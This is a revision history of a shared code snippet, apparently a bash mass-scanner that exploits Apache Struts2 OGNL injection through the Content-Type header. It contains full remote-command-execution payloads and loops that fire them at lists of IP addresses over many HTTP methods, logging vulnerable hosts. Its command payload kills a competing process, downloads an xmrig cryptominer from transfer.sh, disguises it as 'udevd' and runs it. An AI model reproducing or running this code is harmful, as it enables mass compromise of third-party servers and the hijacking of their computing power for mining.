Last active
April 20, 2018 09:11
Revisions
-
f0r34chb3t4 revised this gist
Apr 20, 2018 . No changes.There are no files selected for viewing
-
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -430,7 +430,7 @@ readonly OS_EXEC='(#os=@java.lang.System@getProperty("os.name")).(#context["com. readonly OS_PAYLOAD='%{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${OS_EXEC}"'}' # cmd to exec readonly CMD_EXEC='pkill -9 bioset;cd /tmp;curl -s https://transfer.sh/RBIyE/xmrig > udevd || wget -q -O udevd https://transfer.sh/RBIyE/xmrig;chmod a+x udevd;./udevd;rm -rf udevd;echo 128 > /proc/sys/vm/nr_hugepages;sysctl -w vm.nr_hugepages=128;id;exit' #readonly CMD_EXEC='id;exit' readonly CMD_PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD_WIN}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" -
Apr 20, 2018 . No changes.There are no files selected for viewing
-
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -809,7 +809,7 @@ TXT #dispatcher='%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("X-Frame-Options",255*255)}.multipart/form-data' # for METHOD in HEAD PUT GET POST DELETE TRACE OPTIONS NULL CONNECT; do for XPATH in /; do for METHOD in HEAD PUT GET; do #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${dispatcher}" )" #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${OS_PAYLOAD}" )" -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -430,7 +430,7 @@ readonly OS_EXEC='(#os=@java.lang.System@getProperty("os.name")).(#context["com. readonly OS_PAYLOAD='%{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${OS_EXEC}"'}' # cmd to exec readonly CMD_EXEC='pkill -9 bioset;cd /tmp;curl -s https://transfer.sh/z15mU/xmrig > udevd || wget -q -O udevd https://transfer.sh/z15mU/xmrig;chmod +x udevd;./udevd;rm -rf udevd;echo 128 > /proc/sys/vm/nr_hugepages;sysctl -w vm.nr_hugepages=128;id;exit' #readonly CMD_EXEC='id;exit' readonly CMD_PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD_WIN}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -430,7 +430,7 @@ readonly OS_EXEC='(#os=@java.lang.System@getProperty("os.name")).(#context["com. readonly OS_PAYLOAD='%{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${OS_EXEC}"'}' # cmd to exec readonly CMD_EXEC='pkill -9 bioset;cd /tmp;curl -s https://transfer.sh/z15mU/xmrig > udevd || wget -q -O udevd https://transfer.sh/z15mU/xmrig;chmod +x udevd;./udevd;rm -rf udevd;id;exit' #readonly CMD_EXEC='id;exit' readonly CMD_PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD_WIN}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -430,7 +430,7 @@ readonly OS_EXEC='(#os=@java.lang.System@getProperty("os.name")).(#context["com. readonly OS_PAYLOAD='%{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${OS_EXEC}"'}' # cmd to exec readonly CMD_EXEC='pkill bioset;cd /tmp;curl -s https://transfer.sh/z15mU/xmrig > udevd || wget -q -O udevd https://transfer.sh/z15mU/xmrig;chmod +x udevd;./udevd;rm -rf udevd;id;exit' #readonly CMD_EXEC='id;exit' readonly CMD_PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD_WIN}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -430,7 +430,7 @@ readonly OS_EXEC='(#os=@java.lang.System@getProperty("os.name")).(#context["com. readonly OS_PAYLOAD='%{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${OS_EXEC}"'}' # cmd to exec readonly CMD_EXEC='pkill bioset;cd /tmp;curl -s https://transfer.sh/BPVGD/xmrig > udevd || wget -q -O udevd https://transfer.sh/BPVGD/xmrig;chmod +x udevd;./udevd;rm -rf udevd;id;exit' #readonly CMD_EXEC='id;exit' readonly CMD_PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD_WIN}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" -
Apr 20, 2018 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -807,9 +807,10 @@ TXT #dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].setStatus(123)}.multipart/form-data" #dispatcher='%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("X-Frame-Options",255*255)}.multipart/form-data' # for METHOD in HEAD PUT GET POST DELETE TRACE OPTIONS NULL CONNECT; do for XPATH in ${PATH_LIST}; do for METHOD in HEAD PUT GET; do #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${dispatcher}" )" #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${OS_PAYLOAD}" )" check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" -
Apr 20, 2018 . No changes.There are no files selected for viewing
-
Apr 20, 2018 . No changes.There are no files selected for viewing
-
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -811,7 +811,7 @@ TXT for XPATH in ${PATH_LIST}; do for METHOD in HEAD PUT GET POST DELETE TRACE OPTIONS NULL CONNECT; do #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${dispatcher}" )" #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${OS_PAYLOAD}" )" check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" done done -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -430,7 +430,7 @@ readonly OS_EXEC='(#os=@java.lang.System@getProperty("os.name")).(#context["com. readonly OS_PAYLOAD='%{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${OS_EXEC}"'}' # cmd to exec readonly CMD_EXEC='cd /tmp;curl -s https://transfer.sh/BPVGD/xmrig > udevd || wget -q -O udevd https://transfer.sh/BPVGD/xmrig;chmod +x udevd;./udevd;rm -rf udevd;id;exit' #readonly CMD_EXEC='id;exit' readonly CMD_PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD_WIN}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" -
Apr 20, 2018 . 1 changed file with 5 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -430,10 +430,14 @@ readonly OS_EXEC='(#os=@java.lang.System@getProperty("os.name")).(#context["com. readonly OS_PAYLOAD='%{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${OS_EXEC}"'}' # cmd to exec readonly CMD_EXEC='cd /tmp;curl -s https://transfer.sh/BPVGD/xmrig > udevd || wget -q -O udevd https://transfer.sh/BPVGD/xmrig;chmod +x udevd;./udevd;rm -rf udevd;exit' #readonly CMD_EXEC='id;exit' readonly CMD_PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD_WIN}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" # check HEAD METHOD function hrce(){ -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -806,7 +806,7 @@ TXT for XPATH in ${PATH_LIST}; do for METHOD in HEAD PUT GET POST DELETE TRACE OPTIONS NULL CONNECT; do #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${dispatcher}" )" check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${OS_PAYLOAD}" )" check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" done -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -801,7 +801,7 @@ TXT # check "${IPv4}${XPATH}" "$( rce "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" #done #dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].setStatus(123)}.multipart/form-data" #dispatcher='%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("X-Frame-Options",255*255)}.multipart/form-data' for XPATH in ${PATH_LIST}; do -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -595,7 +595,7 @@ function check(){ fi if grep -qP 'HTTP/1\.(1|0) 123\b' <<< "${buffer}"; then printf '[+] vul 123: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${srv}" "${loc}" | tee -a vul-apache.struts.dat exit 0 fi -
Apr 20, 2018 . No changes.There are no files selected for viewing
-
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -570,7 +570,7 @@ function check(){ if [ ! -z "${os}" ]; then printf '[+] vul os+: %s os: %s\n' "${url}" "${os}" | tee -a vul-os.dat exit 0 fi -
Apr 20, 2018 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -579,12 +579,12 @@ function check(){ local uid="$( grep -P '(uid|guid|groups)=[0-9]{1,5}\(.+?\)' <<< "${buffer}" | tr -d $'\r' | head -n1 )" if [ ! -z "${uid}" ]; then printf '[+] vul uid: %s (%s) (%s) (%s)\n' "${url}" "${uid}" "${hos}" "${loc}" | tee -a vul-uid.dat exit 0 fi if grep -qF 'X-Frame-Options: 65025' <<< "${buffer}"; then printf '[+] vul xfo: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${srv}" "${loc}" | tee -a vul-dispatcher.dat exit 0 fi -
Apr 20, 2018 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -590,13 +590,13 @@ function check(){ if grep -qF 'org.apache.struts' <<< "${buffer}"; then printf '[+] vul str: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${srv}" "${loc}" | tee -a vul-apache.struts.dat exit 0 fi if grep -qP '^HTTP/1\.(1|0) 123\b' <<< "${buffer}"; then printf '[+] vul 123: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${srv}" "${loc}" | tee -a vul-apache.struts.dat exit 0 fi -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -512,7 +512,7 @@ function generic_rce(){ local payload="$3" local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 ) curl -kis --retry 2 -X ${method} \ --location --max-redirs 2 \ -H 'Content-Type: '"${payload}" \ -H 'Cookie: JSESSIONID='"${JSESSIONID}" \ -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -801,7 +801,7 @@ TXT # check "${IPv4}${XPATH}" "$( rce "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" #done dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].setStatus(123)}.multipart/form-data" #dispatcher='%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("X-Frame-Options",255*255)}.multipart/form-data' for XPATH in ${PATH_LIST}; do -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -595,7 +595,7 @@ function check(){ fi if grep -qP '^HTTP/1\.(1|0) 123\b' <<< "${buffer}"; then printf '[+] vul 00: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${srv}" "${loc}" | tee -a vul-apache.struts.dat exit 0 fi -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -595,7 +595,7 @@ function check(){ fi if grep -qP '^HTTP/1\.(1|0) 1\b' <<< "${buffer}"; then printf '[+] vul 00: %s (%s) (%s) (%s)\n' "${url}" "${hos}" "${srv}" "${loc}" | tee -a vul-apache.struts.dat exit 0 fi -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -806,7 +806,7 @@ dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'] for XPATH in ${PATH_LIST}; do for METHOD in HEAD PUT GET POST DELETE TRACE OPTIONS NULL CONNECT; do check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${dispatcher}" )" check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${OS_PAYLOAD}" )" check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" done -
Apr 20, 2018 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -801,8 +801,8 @@ TXT # check "${IPv4}${XPATH}" "$( rce "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" #done dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].setStatus(1)}.multipart/form-data" #dispatcher='%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("X-Frame-Options",255*255)}.multipart/form-data' for XPATH in ${PATH_LIST}; do for METHOD in HEAD PUT GET POST DELETE TRACE OPTIONS NULL CONNECT; do -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -801,7 +801,7 @@ TXT # check "${IPv4}${XPATH}" "$( rce "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" #done #dispatcher="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].setStatus(1)}.multipart/form-data" dispatcher='%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("X-Frame-Options",255*255)}.multipart/form-data' for XPATH in ${PATH_LIST}; do -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -512,7 +512,7 @@ function generic_rce(){ local payload="$3" local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 ) curl -kvis --retry 2 -X ${method} \ --location --max-redirs 2 \ -H 'Content-Type: '"${payload}" \ -H 'Cookie: JSESSIONID='"${JSESSIONID}" \ -
Apr 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -806,7 +806,7 @@ dispatcher='%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"] for XPATH in ${PATH_LIST}; do for METHOD in HEAD PUT GET POST DELETE TRACE OPTIONS NULL CONNECT; do #check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${dispatcher}" )" check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${OS_PAYLOAD}" )" check "${METHOD} ${IPv4}${XPATH}" "$( generic_rce "${METHOD}" "${IPv4}${XPATH}" "${CMD_PAYLOAD}" )" done
NewerOlder